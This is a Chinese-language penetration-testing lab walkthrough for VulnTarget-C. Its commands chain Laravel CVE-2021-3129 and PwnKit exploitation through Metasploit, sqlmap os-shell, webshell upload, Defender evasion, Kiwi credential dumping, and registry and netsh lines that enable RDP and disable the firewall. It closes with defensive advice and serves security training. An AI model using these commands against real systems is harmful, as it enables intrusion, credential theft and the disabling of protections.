vulntarget-c
字数 1295 2025-08-12 11:34:16

VulnTarget-C 靶场实战教学文档

一、靶场概述

VulnTarget-C 是一个模拟真实网络环境的靶场,包含外网和内网渗透场景,涉及以下技术点:

  • Laravel 框架漏洞利用
  • Linux 提权技术
  • 内网横向移动
  • Windows 提权技术
  • 代理与路由配置

二、初始信息收集

1. 端口扫描

使用 nmap 进行初始扫描:

nmap -sC -sV -Pn 192.168.25.137

发现开放端口:

  • 22 (SSH)
  • 80 (HTTP)

2. Web 应用识别

访问 80 端口发现使用 Laravel 框架

三、Laravel 漏洞利用

1. 漏洞识别

目标存在 Laravel Ignition 远程代码执行漏洞 (CVE-2021-3129)

2. Metasploit 利用

使用 Metasploit 模块:

use exploit/multi/php/ignition_laravel_debug_rce
set RHOSTS 192.168.25.137
exploit

成功获取初始 shell

四、Linux 提权

1. 提权建议

使用 Metasploit 的提权建议模块:

use post/multi/recon/local_exploit_suggester
set SESSION <session_id>
run

2. PwnKit 提权 (CVE-2021-4034)

使用 Metasploit 模块:

use exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec
set SESSION <session_id>
exploit

成功获取 root 权限

五、内网渗透准备

1. 网络探测

run get_local_subnets

发现内网网段:10.0.20.0/24

2. 路由配置

run post/multi/manage/autoroute

3. 代理设置

创建代理通道以便访问内网资源

六、内网横向移动

1. 发现内网主机

探测到内网主机:10.0.20.100

2. Web 应用漏洞利用

目标存在 SQL 注入漏洞:

sqlmap -u "http://10.0.20.100/admin/inquiries/view_details.php?id=1*" --random-agent

确认 DBA 权限后获取 os-shell:

sqlmap -u "http://10.0.20.100/admin/inquiries/view_details.php?id=1*" --os-shell

3. WebShell 上传

通过 os-shell 上传 WebShell

4. 信息收集

发现系统运行 Defender 杀毒软件

5. 免杀处理

制作免杀 payload 上线 Metasploit

七、Windows 系统提权

1. 凭证获取

使用 Kiwi 模块抓取密码:

load kiwi
lsa_dump_sam

2. 远程桌面配置

开启远程桌面:

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

3. 防火墙配置

关闭防火墙:

netsh firewall set opmode mode=disable

重置防火墙:

netsh firewall reset

查看状态:

Netsh Advfirewall show allprofiles

4. 远程登录

使用获取的凭证登录远程桌面

5. 发现新内网主机

在应用程序中发现新内网主机:10.0.10.110

八、最终提权

使用与之前类似的提权方法获取最高权限

九、关键知识点总结

  1. Laravel 漏洞利用

    • CVE-2021-3129 漏洞利用
    • Metasploit 模块选择与配置
  2. Linux 提权技术

    • 本地提权建议收集
    • PwnKit (CVE-2021-4034) 漏洞利用
  3. 内网渗透技术

    • 路由与代理配置
    • 内网主机发现
    • SQL 注入到系统权限获取
  4. Windows 提权技术

    • 凭证获取 (Kiwi)
    • 远程桌面配置
    • 防火墙操作
  5. 免杀技术

    • 针对 Defender 的免杀处理

十、防御建议

  1. 针对 Laravel 漏洞

    • 及时更新 Laravel 框架
    • 关闭调试模式
  2. 针对 Linux 系统

    • 及时更新系统补丁
    • 限制 pkexec 等特权程序的使用
  3. 针对 Windows 系统

    • 启用强密码策略
    • 限制远程桌面访问
    • 保持杀毒软件更新
  4. 网络防御

    • 实施网络分段
    • 监控异常流量
    • 限制内网主机间的通信
  5. Web 应用防御

    • 输入验证与参数化查询
    • 最小权限原则
    • 定期安全审计
VulnTarget-C 靶场实战教学文档 一、靶场概述 VulnTarget-C 是一个模拟真实网络环境的靶场,包含外网和内网渗透场景,涉及以下技术点: Laravel 框架漏洞利用 Linux 提权技术 内网横向移动 Windows 提权技术 代理与路由配置 二、初始信息收集 1. 端口扫描 使用 nmap 进行初始扫描: 发现开放端口: 22 (SSH) 80 (HTTP) 2. Web 应用识别 访问 80 端口发现使用 Laravel 框架 三、Laravel 漏洞利用 1. 漏洞识别 目标存在 Laravel Ignition 远程代码执行漏洞 (CVE-2021-3129) 2. Metasploit 利用 使用 Metasploit 模块: 成功获取初始 shell 四、Linux 提权 1. 提权建议 使用 Metasploit 的提权建议模块: 2. PwnKit 提权 (CVE-2021-4034) 使用 Metasploit 模块: 成功获取 root 权限 五、内网渗透准备 1. 网络探测 发现内网网段:10.0.20.0/24 2. 路由配置 3. 代理设置 创建代理通道以便访问内网资源 六、内网横向移动 1. 发现内网主机 探测到内网主机:10.0.20.100 2. Web 应用漏洞利用 目标存在 SQL 注入漏洞: 确认 DBA 权限后获取 os-shell: 3. WebShell 上传 通过 os-shell 上传 WebShell 4. 信息收集 发现系统运行 Defender 杀毒软件 5. 免杀处理 制作免杀 payload 上线 Metasploit 七、Windows 系统提权 1. 凭证获取 使用 Kiwi 模块抓取密码: 2. 远程桌面配置 开启远程桌面: 3. 防火墙配置 关闭防火墙: 重置防火墙: 查看状态: 4. 远程登录 使用获取的凭证登录远程桌面 5. 发现新内网主机 在应用程序中发现新内网主机:10.0.10.110 八、最终提权 使用与之前类似的提权方法获取最高权限 九、关键知识点总结 Laravel 漏洞利用 : CVE-2021-3129 漏洞利用 Metasploit 模块选择与配置 Linux 提权技术 : 本地提权建议收集 PwnKit (CVE-2021-4034) 漏洞利用 内网渗透技术 : 路由与代理配置 内网主机发现 SQL 注入到系统权限获取 Windows 提权技术 : 凭证获取 (Kiwi) 远程桌面配置 防火墙操作 免杀技术 : 针对 Defender 的免杀处理 十、防御建议 针对 Laravel 漏洞 : 及时更新 Laravel 框架 关闭调试模式 针对 Linux 系统 : 及时更新系统补丁 限制 pkexec 等特权程序的使用 针对 Windows 系统 : 启用强密码策略 限制远程桌面访问 保持杀毒软件更新 网络防御 : 实施网络分段 监控异常流量 限制内网主机间的通信 Web 应用防御 : 输入验证与参数化查询 最小权限原则 定期安全审计